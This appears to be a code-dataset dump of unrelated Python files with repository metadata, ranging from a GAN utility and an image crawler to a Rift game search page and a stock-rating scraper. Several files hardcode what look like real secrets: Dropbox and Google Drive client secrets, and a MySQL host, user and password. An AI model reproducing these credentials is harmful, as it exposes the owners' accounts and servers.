DROPBOX_APP_SECRET = '4pqoe16cl3jtctf'
GDRIVE_CLIENT_ID='384706005510-hbbdfl1tef8g06artuuft5ubc7a9fllp.apps.googleusercontent.com'
GDRIVE_CLIENT_SECRET='RyYaHJkGL_Q9rYeqcjIylbHO'
GDRIVE_REDIRECT_URI = 'http://127.0.0.1:5000/google-auth-finish'
GDRIVE_SCOPE="https://www.googleapis.com/auth/drive"
USER_SCHEMA = ("id", "username", "password", "db_access_token", "gd_access_token")
FILE_SCHEMA = ("id", "owner", "name", "parent", "content_path", "dropbox", "folder", "last_updated")
|
[
"akhiaji@gmail.com"
] |
akhiaji@gmail.com
|
618a19c0b38addb258cf53adb9766c353634ccf0
|
41609905c56ec5c9d00e8d872fb847e5c5be10f4
|
/src/models/image.py
|
7a9d80e2b15b6b8aed44bdf1d31a50565642c093
|
[] |
no_license
|
elmerihyvonen/ImageService
|
6a073cb82ce2995eedad2297d79e776738a2ad80
|
699e7d945e64ea2407c7ea1912ad76b366dc9bb2
|
refs/heads/IS2
| 2023-05-25T13:59:14.272119
| 2023-03-30T16:37:41
| 2023-03-30T16:37:41
| 233,829,284
| 0
| 0
| null | 2023-05-22T22:38:32
| 2020-01-14T11:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,721
|
py
|
import uuid
import datetime
from src.common.database import Database
class Image(object):
def __init__(self, username: str, caption: str, filename: str, author_pic: str,
date=None, _id=None):
self._id = uuid.uuid4().hex if _id is None else _id
self.username = username
self.caption = caption
self.filename = filename
self.author_pic = author_pic
self.date = datetime.datetime.now().strftime("%d/%m/%Y, %H:%M") if date is None else date
# saving the image in to the database
def save_to_mongo(self):
Database.insert(collection="images",
data=self.json())
def json(self):
return {
"_id": self._id,
"username": self.username,
"caption": self.caption,
"filename": self.filename,
"author_pic": self.author_pic,
"date": self.date
}
# saves new image to database
@classmethod
def new_image(cls, username, caption, filename, author_pic):
image = Database.find_one(collection='images', query={'username': username, 'filename': filename})
# checks if this filename already exists for this username
if image is None:
new_image = Image(username, caption, filename, author_pic)
new_image.save_to_mongo()
return True
else:
# return False if the image was already there
return False
# returns a single Image object for given filename
@classmethod
def image_from_mongo(cls, filename):
image_data = Database.find_one(collection='images', query={'filename': filename})
return cls(**image_data)
# returns all images posted by given username
@classmethod
def images_from_mongo(cls, username):
images = Database.find(collection="images",
query={'username': username})
return [cls(**image) for image in images]
# returns all images posted
@classmethod
def all_images(cls):
images = Database.find(collection="images", query={})
return [cls(**image) for image in images]
# returns a single Image object for given _id
@classmethod
def get_by_id(cls, image_id):
image_data = Database.find_one(collection='images', query={'_id': image_id})
return cls(**image_data)
# removes a image from database with given identifier if one exists in database
def delete_image(self):
Database.delete(collection='images', query={'_id': self._id})
@classmethod
def delete_images(cls, username):
Database.delete(collection='images', query={'username': username})
|
[
"56589617+elmerihyvonen@users.noreply.github.com"
] |
56589617+elmerihyvonen@users.noreply.github.com
|
cf7e1111fe8cfc94ade35f4ac913406453ead140
|
747de538fb8ffc535a5d107cb5852c885da451b9
|
/experiments/3_graph_classification_half.py
|
d257d878c14b2ad267bf3649e6473754152013eb
|
[] |
no_license
|
NilVidalRafols/iGNNspector
|
0a608ff2aa6a003a6ae22105e286db6023841bcb
|
3d8742e20a5df0606fe201440fe4c382350f68a6
|
refs/heads/main
| 2023-06-05T09:51:00.840402
| 2021-06-30T03:43:57
| 2021-06-30T03:43:57
| 346,396,589
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,575
|
py
|
# -*- coding: utf-8 -*-
"""3. Graph Classification.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1I8a0DfQ3fI7Njc62__mVXUlcAleUclnb
"""
"""# Graph Classification with Graph Neural Networks
[Previous: Node Classification with Graph Neural Networks](https://colab.research.google.com/drive/14OvFnAXggxB8vM4e8vSURUp1TaKnovzX)
In this tutorial session we will have a closer look at how to apply **Graph Neural Networks (GNNs) to the task of graph classification**.
Graph classification refers to the problem of classifiying entire graphs (in contrast to nodes), given a **dataset of graphs**, based on some structural graph properties.
Here, we want to embed entire graphs, and we want to embed those graphs in such a way so that they are linearly separable given a task at hand.
The most common task for graph classification is **molecular property prediction**, in which molecules are represented as graphs, and the task may be to infer whether a molecule inhibits HIV virus replication or not.
The TU Dortmund University has collected a wide range of different graph classification datasets, known as the [**TUDatasets**](https://chrsmrrs.github.io/datasets/), which are also accessible via [`torch_geometric.datasets.TUDataset`](https://pytorch-geometric.readthedocs.io/en/latest/modules/datasets.html#torch_geometric.datasets.TUDataset) in PyTorch Geometric.
Let's load and inspect one of the smaller ones, the **MUTAG dataset**:
"""
import torch
from torch_geometric.datasets import TUDataset
|
[
"nil.vidal.rafols@est.fib.upc.edu"
] |
nil.vidal.rafols@est.fib.upc.edu
|
fc448f9c12c61c2fc3ef593aa6433223db03d3fd
|
913d75ae3ff83e6d23cd7043627381c7cc960173
|
/appwechatPO/page/contactdetailbriefInfo.py
|
433201316240c36053d2a1148151eb041eb23d91
|
[] |
no_license
|
CandiceDiao/lagouhomework
|
2655dbb59c891cbff620d4fd655137aa64b8746b
|
59fee20b482657591104cc7b39abd3ea447867d8
|
refs/heads/master
| 2023-01-12T15:18:21.006028
| 2020-11-11T09:07:45
| 2020-11-11T09:07:45
| 273,626,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
from appium.webdriver.common.mobileby import MobileBy
from appwechatPO.page.basepage import BasePage
#个人信息页面
from appwechatPO.page.contactdetailsettingpage import ContactDetailSettingPage
class ContactDetailBriefInfo(BasePage):
_member_info='//*[@text="个人信息"]/../../../../../*[@class="android.widget.LinearLayout"][2]'
def click_edit_member_info(self):
self.find(MobileBy.XPATH,self._member_info).click()
return ContactDetailSettingPage(self.driver)
|
[
"diaochen@viewhigh.com"
] |
diaochen@viewhigh.com
|
98134f9a88aa1f45dfb3d8b5fbd0be2bdf81c15a
|
4622f05fa5e686eda93185ceebd9ce631321adea
|
/src/utils.py
|
6346d2c1a90e83ba76cd5f019c63d34a4a18584f
|
[] |
no_license
|
davisliang/generative
|
b4d64654c531abc57573d2364ddab481e75ea3ae
|
8df308e42dc60d559f39e2645a1851f28008a315
|
refs/heads/master
| 2021-06-18T08:47:13.261182
| 2017-06-23T02:20:07
| 2017-06-23T02:20:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,183
|
py
|
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import os
import scipy
import input_data
import scipy.misc
#this function performns a leaky relu activation, which is needed for the discriminator network.
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
#The below functions are taken from carpdem20's implementation https://github.com/carpedm20/DCGAN-tensorflow
#They allow for saving sample images from the generator to follow progress
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def imsave(images, size, path):
return scipy.misc.imsave(path, merge(images, size))
def inverse_transform(images):
return (images+1.)/2.
def merge(images, size):
h, w = images.shape[1], images.shape[2]
img = np.zeros((h * size[0], w * size[1]))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j*h:j*h+h, i*w:i*w+w] = image
return img
def generator(z, initializer):
zP = slim.fully_connected(z,4*4*256,normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_project',weights_initializer=initializer)
zCon = tf.reshape(zP,[-1,4,4,256])
gen1 = slim.convolution2d_transpose(\
zCon,num_outputs=64,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv1', weights_initializer=initializer)
gen2 = slim.convolution2d_transpose(\
gen1,num_outputs=32,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv2', weights_initializer=initializer)
gen3 = slim.convolution2d_transpose(\
gen2,num_outputs=16,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv3', weights_initializer=initializer)
g_out = slim.convolution2d_transpose(\
gen3,num_outputs=1,kernel_size=[32,32],padding="SAME",\
biases_initializer=None,activation_fn=tf.nn.tanh,\
scope='g_out', weights_initializer=initializer)
return g_out
def discriminator(bottom, initializer, reuse=False):
dis1 = slim.convolution2d(bottom,16,[4,4],stride=[2,2],padding="SAME",\
biases_initializer=None,activation_fn=lrelu,\
reuse=reuse,scope='d_conv1',weights_initializer=initializer)
dis2 = slim.convolution2d(dis1,32,[4,4],stride=[2,2],padding="SAME",\
normalizer_fn=slim.batch_norm,activation_fn=lrelu,\
reuse=reuse,scope='d_conv2', weights_initializer=initializer)
dis3 = slim.convolution2d(dis2,64,[4,4],stride=[2,2],padding="SAME",\
normalizer_fn=slim.batch_norm,activation_fn=lrelu,\
reuse=reuse,scope='d_conv3',weights_initializer=initializer)
d_out = slim.fully_connected(slim.flatten(dis3),1,activation_fn=tf.nn.sigmoid,\
reuse=reuse,scope='d_out', weights_initializer=initializer)
return d_out
|
[
"davisblaine.liang@gmail.com"
] |
davisblaine.liang@gmail.com
|
09f18f3ed911f9d3c785108f4fed976bb636824d
|
926bf2c5275429ffe4a6dcb7989cf9ce84d4234d
|
/14_image_crawling_check_last_modified.py
|
670f791592294b383f362408c0da2c9cb151b84c
|
[] |
no_license
|
Tragicalone/Python
|
4ddc5a1ef9f391b12012dcc37404af7b25022d4c
|
65e2cdf6d6dfbab36f0b2c0164b5ca1b93219dc9
|
refs/heads/master
| 2020-03-26T21:47:33.976719
| 2019-03-04T05:01:41
| 2019-03-04T05:01:41
| 145,408,656
| 0
| 0
| null | 2018-08-20T11:46:33
| 2018-08-20T11:27:31
| null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
import os
import requests
from PIL import Image
#from time import ctime
#from pprint import pprint
from bs4 import BeautifulSoup
from datetime import datetime
AssignedLastModifiedTime = datetime(2018, 1, 29, 14, 39, 10)
OutputPath = os.path.abspath('..\PythonResults')
if not os.path.exists(OutputPath):
os.makedirs(OutputPath)
for IMGTag in BeautifulSoup(requests.get("https://afuntw.github.io/Test-Crawling-Website/pages/portfolio/index.html").text, "lxml").find_all('img'):
ImageURL = IMGTag['src']
ImageHeaders = dict(requests.head(ImageURL).headers)
if 'Last-Modified' in ImageHeaders and datetime.strptime(ImageHeaders['Last-Modified'], '%a, %d %b %Y %H:%M:%S GMT') < AssignedLastModifiedTime:
continue
ImageData = Image.open(requests.get(ImageURL, stream=True).raw)
BaseFileName = os.path.basename(ImageURL)
print("catch the filename " + BaseFileName + " and the real format is " + ImageData.format)
SavedFileName = os.path.join(OutputPath, BaseFileName.split('.')[0] + '.' + ImageData.format.lower())
ImageData.save(SavedFileName)
print("save image at " + SavedFileName)
|
[
"tragicalone@yahoo.com.tw"
] |
tragicalone@yahoo.com.tw
|
c536d6ee178ac04d4be8ddd7c1667c5ad1a79b0c
|
10f075f6f875fa185b4da99af468a064c82c91b4
|
/index.py
|
a8ed23e112f7e2b867fce72caa11d42be847d835
|
[
"MIT"
] |
permissive
|
chennin/rift-firsts-webpage
|
c93f3245bf143c48e5c9941bfb018a4c3af0cabe
|
c7442360440004ce689ea4482088d8550bf6678e
|
refs/heads/master
| 2021-01-20T07:02:11.652750
| 2018-08-17T12:05:48
| 2018-08-17T12:05:48
| 89,948,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,068
|
py
|
#/usr/bin/env python3.5
#Copyright (c) 2017 Christopher S Henning
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from six.moves import configparser
from yattag import Doc
import os, glob
import pymysql.cursors
import sys
from datetime import datetime
import re, string
from urllib.parse import parse_qsl
from html import escape
# Read config file in
mydir = os.path.dirname(os.path.realpath(__file__))
configReader = configparser.RawConfigParser()
success = configReader.read(mydir + "/config.txt")
if not success:
sys.exit("Missing configuration file {0}/config.txt".format(mydir))
config = {}
configitems = ["SQLUSER", "SQLDB", "SQLLOC", "SQLPASS", "ZIPDIR"]
for var in configitems:
try:
config[var] = configReader.get("Firsts",var)
except configparser.NoSectionError:
sys.exit("Missing configuration section 'Firsts'")
except (configparser.NoOptionError):
sys.exit("Missing configuration item {0}. {1} are required.".format(var, ", ".join(configitems)))
eushards = ["Bloodiron", "Brisesol", "Brutwacht", "Gelidra", "Typhiria", "Zaviel"]
nashards = ["Deepwood", "Faeblight", "Greybriar", "Hailol", "Laethys", "Seastone", "Wolfsbane"]
kinds = ["All", "Achievement", "ArtifactCollection", "Item", "NPC", "Quest", "Recipe"]
# WSGI function
def application(environ, start_response):
# the environment variable CONTENT_LENGTH may be empty or missing
try:
request_body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
request_body_size = 0
request_body = environ['wsgi.input'].read(request_body_size)
env = dict(parse_qsl(request_body.decode()))
# Initialize search parameters
search = { 'player': "", 'shard': "", 'guild': "", 'kind': "", }
for var in search:
if var in env:
search[var] = env[var]
# Filter invalid input
# An invalid Kind or Shard is reset to All
# Player + Guild names should only contain "letters" (this includes accented letters)
if search['kind'] not in kinds:
search['kind'] = "All"
if search['shard'] not in ["All"] + nashards + eushards:
search['shard'] = "All"
pattern = re.compile('\W+')
pattern.sub('', search['player'])
search['player'] = search['player'].capitalize()
pattern.sub('', search['guild'])
results = None
# The model is to print verbose errors to console/log, and print a generic error to Web page
# Initialize generic error here
error = None
# If a player name OR guild name is input, search the DB using all parameters
if search['player'] != "" or search['guild'] != "":
query = "SELECT Kind, What, Player, Shard, Guild, Stamp, Id FROM firsts WHERE "
params = []
args = []
for var in search:
# Don't need to search for shard or kind == All
if search[var] != "" and (var not in ["kind", "shard"] or search[var] != "All"):
params.append("{0}=%s ".format(var))
args.append(search[var])
query += "AND ".join(params)
query += " ORDER BY Kind, Stamp"
connection = None
try:
connection = pymysql.connect(host=config["SQLLOC"],
user=config["SQLUSER"],
password=config["SQLPASS"],
db=config["SQLDB"],
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
except Exception as e:
# This just kills one WSGI worker which will be respawned
# Maybe find how to kill the WSGI server if we assume connection problems (eg wrong pass) are fatal
print("Failed to connect to SQL database. {0}".format(e), file=sys.stderr)
error = "Something went wrong with the SQL connection."
if connection:
try:
with connection.cursor() as cursor:
cursor.execute(query, args)
results = cursor.fetchall()
except Exception as e:
print(e, file=sys.stderr)
error = "Something went wrong with the SQL query."
finally:
connection.close()
# OK, now start constructing HTML
# The defaults dict makes the select dropdowns default to the input later
doc, tag, text, line = Doc(defaults = {'shard': search['shard'], 'kind': search['kind']}).ttl()
doc.asis('<!DOCTYPE html>')
with tag('html'):
with tag('head'):
doc.stag('meta', ('http-equiv', "Content-Type"), ('content', "text/html; charset=utf-8"))
doc.stag('link', ('rel', "stylesheet"), ('type', "text/css"), ('href', "style.css"))
doc.stag('link', ('rel', "stylesheet"), ('type', "text/css"), ('href', "https://www.magelocdn.com/pack/magelo-bar-css2.css"))
# <script> is NOT a void tag, so need with/pass
with tag('script', ('src', "./sorttable.js"), ('type', "text/javascript")):
pass
with tag('script', ('src', "https://www.magelocdn.com/pack/rift/en/magelo-bar.js#1"), ('type', "text/javascript")):
pass
with tag('title'):
text("RIFT Shard Firsts Search")
with tag('body'):
# Prevent Cloudflare interpreting Player@Shard as email
doc.asis("<!--email_off-->")
# Intro / search boxes
with tag('h3'):
text("Rift Shard Firsts")
line('p', "This site tells you the shard firsts for your character or guild.")
with tag('p'):
# Find date of latest zip
date = "*unknown*"
for myfile in glob.glob("{0}/Rift_Discoveries*.zip".format(config['ZIPDIR'])):
match = re.search(r'\d{4}-\d{1,2}-\d{1,2}', myfile)
date = datetime.strptime(match.group(), '%Y-%m-%d').date()
text("Data is checked for from Trion daily. The latest is dated ")
line('em', "{0}".format(date))
text(". All information is straight from Trion's ")
line('a', "public assets", href = "http://webcdn.triongames.com/addons/assets/")
text(".")
with tag('form', ('id', "firstfrom")):
line('label', "Character: ", ('for', "player"))
doc.stag('input', ('type', "text"), ('name', "player"), ('id', "player"), ('size', "14"), ('maxlength', "255"), ('value', escape(search['player']) if search['player'] != "" else ""))
line('label', " Shard: ", ('for', "shard"))
with doc.select(('name', "shard"), ('id', "shard")):
line('option', "All")
with tag('optgroup', label = "NA"):
for shard in nashards:
with doc.option(value = shard):
text(shard)
with tag('optgroup', label = "EU"):
for shard in eushards:
with doc.option(value = shard):
text(shard)
line('label', " Guild: ", ('for', "guild"))
doc.stag('input', ('type', "text"), ('name', "guild"), ('id', "guild"), ('size', "14"), ('value', escape(search['guild']) if search['guild'] != "" else ""))
line('label', " Type: ", ('for', "kind"))
with doc.select(('name', "kind"), ('id', "kind")):
for kind in kinds:
with doc.option(value = kind):
text(kind)
doc.stag('input', ('type', "submit"), ('formmethod', "post"))
line('p', "Enter a player name and/or a guild name, then press Submit.")
# If we had an earlier error, print the generic message here
if error:
line('p', error)
# Print search results
# The SQL query above can return firsts of 0-6 Kinds, but was only one query.
# We want to print one table per Kind, and not have empty tables.
# Thus the manual idx incrementing and starting a new table when a new Kind is encountered
if results is not None:
idx = 0
reslen = len(results)
for kind in kinds:
if idx >= reslen: # End of results
break
if results[idx]['Kind'] != kind: # No firsts for this Kind, so go to the next without starting a table for it
continue
line('h4', "{0}s".format(kind), klass = "tablename")
with tag('table', klass = 'sortable'):
with tag('thead'):
with tag('tr'):
for header in ['Player', 'Guild', 'What', 'Date (UTC)']:
line('th', header)
with tag('tbody'):
# Loop through and print rows until end or next table needed
while idx < reslen and results[idx]['Kind'] == kind:
with tag('tr'):
for cell in ['Player', 'Guild', 'What', 'Stamp']:
if cell == 'What':
with tag('td'):
magurl = kind.lower()
if magurl == "artifactcollection":
magurl = "artifactset"
line('a', results[idx][cell], href = "https://rift.magelo.com/en/{0}/{1}".format(magurl,results[idx]['Id']))
else:
if cell == 'Player':
results[idx][cell] += "@" + results[idx]['Shard']
# The timestamp comes out as a datetime.datetime. Manually make everything a string.
line('td', results[idx][cell].__str__())
idx += 1
with tag('p'):
text('See other RIFT tools ')
line('a', "here", href="https://rift.events/main.html")
text('.')
doc.asis('<!--/email_off-->')
start_response('200 OK', [('Content-Type','text/html')])
return [doc.getvalue().encode('utf8')]
|
[
"saturos@gmail.com"
] |
saturos@gmail.com
|
8fc93cb60924b550a0d0ea9d4aec76d96c598d47
|
b8b93ba3a9cbf7231573b636cbd50de157fe23cb
|
/test/main/PandasTest.py
|
cd4ac2a3d9f06e1c835edb14402712985144c991
|
[] |
no_license
|
JeffreyLinWeiYou/TestGit
|
18c2af1d6d8c6dcf0900ba8196a7bfd70a98c48f
|
9538624ac24b0a88dbd9498bb414d38a83361692
|
refs/heads/master
| 2020-06-15T17:25:10.663993
| 2016-12-01T09:15:39
| 2016-12-01T09:15:39
| 75,275,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,392
|
py
|
#-*- coding:utf-8 -*-
#撈取鉅亨網資料
import pandas as pd
import MySQLdb
import time
import datetime
'''
Created on 2015年10月23日
@author: ben
'''
if __name__ == '__main__':
stop=False
nowDate=datetime.date.today()
endDate=datetime.date(2012,01,01)
temp=nowDate-endDate
db=MySQLdb.connect("140.118.7.46","s8107072004","ben60514","test",charset='utf8')
cursor =db.cursor()
while temp.days>0:
firstDate=nowDate
secondDate=nowDate-datetime.timedelta(days=30)
# print "firstDate=",firstDate
# print "secondDate=",secondDate
i=1
while True:
try:
url = "http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=%d&ratetype=QFII&ratedate1=%s&ratedate2=%s&sortorder=date"%\
(i,secondDate.strftime('%Y%m%d'),nowDate.strftime('%Y%m%d'))
print url
data = pd.read_html(url)
frameData=data[len(data)-3][2:]
#print frameData
# print frameData
i+=1
except:
break
for index,row in frameData.iterrows():
# sql="INSERT INTO foreign_original(date,code,company,traderCompany,originalRate,riseOrDrop,newRate,\
# EPS,oldTargetPrice,newTargetPrice,nowPrice,remark)\
# VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" %\
# (row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11])
# try:
# cursor.execute(sql)
# db.commit()
# except MySQLdb.Error as e:
# print "Error %d: %s" % (e.args[0], e.args[1])
print type(row[10])
print row[10]
break
nowDate=nowDate-datetime.timedelta(days=31)
temp=nowDate-endDate
db.close()
# print type(temp.days)
# print temp.days
#
# print nowDate.strftime('%Y%m%d')
# print type(nowDate)
url = 'http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=2&ratetype=QFII&ratedate1=20150708&ratedate2=20151023&sortorder=date'
#http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=2&ratetype=QFII&ratedate1=20150708&ratedate2=20151023&sortorder=date
# data = pd.read_html(url)
# print len(data)
# frameData=data[len(data)-3]
# print (frameData.iloc[[2]])[0]
# print type(frameData.iloc[[2]])
# db=MySQLdb.connect("140.118.7.46","s8107072004","ben60514","crawler_test",charset='utf8')
# cursor =db.cursor()
# sql="INSERT INTO foreign_original(date,code,company,traderCompany,originalRate,riseOrDrop,newRate,\
# EPS,oldTargetPrice,newTargetPrice,nowPrice,remark)\
# VALUES ('%d','%d','%s','%s','%s','%s','%s','%s','%f','%f','%f','%s')" %\
# (20150713,2382,'廣達','麥格理','--','首次','超越市場表現','--',0,86,57.10,'--')
# try:
# cursor.execute(sql)
# db.commit()
# except MySQLdb.Error as e:
# print "Error %d: %s" % (e.args[0], e.args[1])
# db.close()
#print type(data[len(data)-3])
#print data[len(data)-3]
#data[0]
pass
|
[
"m10407519@mail.ntust.edu.tw"
] |
m10407519@mail.ntust.edu.tw
|
021b6bc6e0b4c42b02abd800e83abb5c79ecf202
|
f15815e06a9d91957a637dde81a11f588e9a0b76
|
/python retrospect/TCP-Client.py
|
8bd9bf38c5936b621c3b207b329f1f92bfd8c0f4
|
[] |
no_license
|
CoffeeCati/Spider
|
30db20ce8c785713553538505598b2b49ea1a81d
|
996be09c1aa28c7f87bb88fdb66b9198ad232ae4
|
refs/heads/master
| 2023-03-30T01:20:31.008342
| 2021-03-16T08:10:52
| 2021-03-16T08:10:52
| 347,562,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
# coding:utf-8
import socket
# 初始化socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接目标IP和端口
s.connect(('127.0.0.1', 9999))
# 接收消息
print('--->>' + s.recv(1024).decode('utf-8'))
# 发送消息
s.send(b'Hello I am a client!')
print('--->>' + s.recv(1024).decode('utf-8'))
s.send(b'exit')
# 关闭Socket
s.close()
|
[
"liushuo@liushuodeMacBook-Air.local"
] |
liushuo@liushuodeMacBook-Air.local
|
91c16b7f88506a969d154a333aa1c6e31b157ca6
|
042b95bf8ff71bf707806d8ccb63a5275bafd97e
|
/todo/tasks/migrations/0001_initial.py
|
3174f72ea089c8338839448d6ef7de54fb019d11
|
[] |
no_license
|
jcramirez9920/Project-3-todo
|
d19a7d88fa5791ddff16cdec75ec0ccbd9753e0e
|
833e6a29083118a37f7552558a7e97199664bb52
|
refs/heads/main
| 2023-02-08T13:49:49.712482
| 2021-01-03T03:30:08
| 2021-01-03T03:30:08
| 326,319,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
# Generated by Django 3.1.4 on 2021-01-03 02:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('complete', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"noreply@github.com"
] |
jcramirez9920.noreply@github.com
|
d1f1d88d29f302999839d0333712af4358988c6b
|
8d472f89dd6a62d3b0c8853fa8fbeab0061e639f
|
/elevator_simulation_submit/main.py
|
3c7302fe3282305c1ba2a8fb222e533efd2f9912
|
[] |
no_license
|
chrisskhoury/ElevatorSimulation
|
abcc06cfb381f78507ad7cbc0eacbc42b340de04
|
3006ee94cd3798117d303a330b150be2962fc8a1
|
refs/heads/master
| 2023-01-23T03:31:38.093510
| 2020-11-20T12:13:10
| 2020-11-20T12:13:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
from visual import *
def main():
is_visual = True
sim1 = Simulation(mode = 0, visual=is_visual)
sim2 = Simulation(mode = 1, visual=is_visual)
visual = Visual((sim1, sim2))
vis = Thread(target=visual.draw)
if is_visual:
vis.start()
t1 = Thread(target=sim1.start_elevator)
t2 = Thread(target=sim2.start_elevator)
t1.start()
sleep(0.5)
t2.start()
t1.join()
t2.join()
vis.join()
if __name__ == "__main__":
main()
|
[
"khourychris13@gmail.com"
] |
khourychris13@gmail.com
|
e36c638dad1da5fce1f73b4a66df9bfb794d17c1
|
868a1a37d11f48dbe22c01849fffd0d8bca27937
|
/code/distance_matrix_csv_to_time_curves_format.py
|
34e9d1acb67c78a1ce3bb7471853c1da595b896a
|
[] |
no_license
|
NattyBumppo/aero-astro-thesis
|
092b5b380d3bd3de889d9478e2d18e297c2fc629
|
a5b15906c660d420d058b06f09603177abe958a0
|
refs/heads/master
| 2021-01-10T15:52:01.655140
| 2016-03-15T04:14:16
| 2016-03-15T04:14:16
| 51,424,010
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,025
|
py
|
import csv
import json
import datetime
import sys
import numpy as np
pcc_distance_matrix = 'pcc_distance_matrix.csv'
tau_distance_matrix = 'tau_distance_matrix.csv'
rho_distance_matrix = 'rho_distance_matrix.csv'
pcc_timecurve_json_filename = 'pcc_timecurve_from_distance_matrix.json'
tau_timecurve_json_filename = 'tau_timecurve_from_distance_matrix.json'
rho_timecurve_json_filename = 'rho_timecurve_from_distance_matrix.json'
pcc_name = 'PFM2 User Test Data (PCC Correlations)'
tau_name = 'PFM2 User Test Data (Kendall\'s Tau Correlations)'
rho_name = 'PFM2 User Test Data (Spearman\'s Rho Correlations)'
pcc_distance_matrix_simpler = 'pcc_distance_matrix_simpler.csv'
tau_distance_matrix_simpler = 'tau_distance_matrix_simpler.csv'
rho_distance_matrix_simpler = 'rho_distance_matrix_simpler.csv'
pcc_timecurve_json_filename_simpler = 'pcc_timecurve_from_distance_matrix_simpler.json'
tau_timecurve_json_filename_simpler = 'tau_timecurve_from_distance_matrix_simpler.json'
rho_timecurve_json_filename_simpler = 'rho_timecurve_from_distance_matrix_simpler.json'
pcc_name_simpler = 'PFM2 User Test Data (PCC Correlations, Simplified)'
tau_name_simpler = 'PFM2 User Test Data (Kendall\'s Tau Correlations, Simplified)'
rho_name_simpler = 'PFM2 User Test Data (Spearman\'s Rho Correlations, Simplified)'
pcc_distance_matrix_averaged = 'pcc_distance_matrix_averaged.csv'
tau_distance_matrix_averaged = 'tau_distance_matrix_averaged.csv'
rho_distance_matrix_averaged = 'rho_distance_matrix_averaged.csv'
pcc_timecurve_json_filename_averaged = 'pcc_timecurve_from_distance_matrix_averaged.json'
tau_timecurve_json_filename_averaged = 'tau_timecurve_from_distance_matrix_averaged.json'
rho_timecurve_json_filename_averaged = 'rho_timecurve_from_distance_matrix_averaged.json'
pcc_name_averaged = 'PFM2 User Test Data (PCC Correlations, Averaged in 5-Second Chunks)'
tau_name_averaged = 'PFM2 User Test Data (Kendall\'s Tau Correlations, Averaged in 5-Second Chunks)'
rho_name_averaged = 'PFM2 User Test Data (Spearman\'s Rho Correlations, Averaged in 5-Second Chunks)'
# Let's dump these out into a .json file for timecurve conversion
for input_distance_matrix_filename, output_json_filename, dataset_name in ((pcc_distance_matrix, pcc_timecurve_json_filename, pcc_name),
(tau_distance_matrix, tau_timecurve_json_filename, tau_name),
(rho_distance_matrix, rho_timecurve_json_filename, rho_name),
(pcc_distance_matrix_simpler, pcc_timecurve_json_filename_simpler, pcc_name_simpler),
(tau_distance_matrix_simpler, tau_timecurve_json_filename_simpler, tau_name_simpler),
(rho_distance_matrix_simpler, rho_timecurve_json_filename_simpler, rho_name_simpler),
(pcc_distance_matrix_averaged, pcc_timecurve_json_filename_averaged, pcc_name_averaged),
(tau_distance_matrix_averaged, tau_timecurve_json_filename_averaged, tau_name_averaged),
(rho_distance_matrix_averaged, rho_timecurve_json_filename_averaged, rho_name_averaged)):
# Load distance matrix from .csv file
reader = csv.reader(open(input_distance_matrix_filename,"rb"),delimiter=',')
distance_matrix = list(reader)
